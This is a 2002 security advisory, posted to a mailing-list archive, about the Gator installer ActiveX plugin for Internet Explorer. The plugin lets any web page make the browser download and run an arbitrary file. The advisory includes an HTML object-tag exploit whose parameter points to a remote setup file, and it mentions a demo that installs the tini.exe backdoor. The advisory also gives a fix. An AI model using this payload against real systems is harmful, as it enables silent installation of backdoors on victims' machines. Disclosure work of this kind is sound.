OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: obscure (obscureeyeonsecurity.net)
Date: Wed Feb 20 2002 - 16:30:19 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Advisory Title: Gator installer Plugin allows any software to be installed
    Release Date: 21/01/2002

    Application: Gator installer plugin for Internet Explorer (GAIN)

    Platform: Windows clients with Internet Explorer.

    DLL version - 3.0.6.1

    Severity: Malicious users can install backdoor software and
    gain easy access to the target machine.

    Author:
    Obscure^
    [ obscureeyeonsecurity.net ]

    Vendor Status:
    Not informed.

    Web:

    http://www.gator.com
    http://eyeonsecurity.net/advisories/gatorieplugin.html

    Background.

    (extracted from
    http://gator.com)

    Features:
    Fills in FORMS without typing!
    Remembers PASSWORDS automatically
    Protects and encrypts your data on YOUR computer
    Gator comes bundled .. etc

    The vulnerabity exists in a plugin which installs the actual
    software. This plugin is scriptable and an HTML page to specify
    the location of the Gator installation. This activeX component
    is usually installed from this page:
    http://www.gator.com/download/msie.html

    Problem.

    The issue here is that any HTML page can specify the location

    of the Gator installation file. The
    installation file is downloaded, then it is checked for the
    filename. If the filename is setup.ex_, it is then decompressed
    and executed. If the file is not compressed it will still execute
    it. Of course using this method, a malicious user can easily create
    an HTML page which makes use of the rogue ActiveX component to
    point at a trojan file.

    Exploit Example.

    <xbject
             id="IEGator"
             classid="CLSID:29EEFF42-F3FA-11D5-A9D5-00500413153C"

    codebase="http://www.gator.com/download/2500/iegator_3061_gatorsetup.cab"
             align="baseline"
             border="0"
             width="400"
             height="20">
    <pxram name="params"
    value="fcn=setup&src=eyeonsecurity.net/advisories/gatorexploit/setup.ex_&bgc
    olor=F0F1D0&aic=",aicStr,"&">
    </xbject>

    I set up a small demonstation which installs tini.exe
    (which is a trojan listening on port 7777).
    If you need any information about tini.exe check out
    http://www.ntsecurity.nu/toolbox/tini/.
    The exploit example is found at :
    http://eyeonsecurity.net/advisories/gatorexploit

    Fix.

    Simply delete the ActiveX component from
    %windir%\Downloaded Program Files .. i think that should fix it.

    Disclaimer.

    The information within this document may change without notice. Use of
    this information constitutes acceptance for use in an AS IS
    condition. There are NO warranties with regard to this information.
    In no event shall the author be liable for any consequences whatsoever
    arising out of or in connection with the use or spread of this
    information. Any use of this information lays within the user's
    responsibility.

    Feedback.

    Please send suggestions, updates, and comments to:

    Eye on Security
    mail : obscureeyeonsecurity.net
    web : http://www.eyeonsecurity.net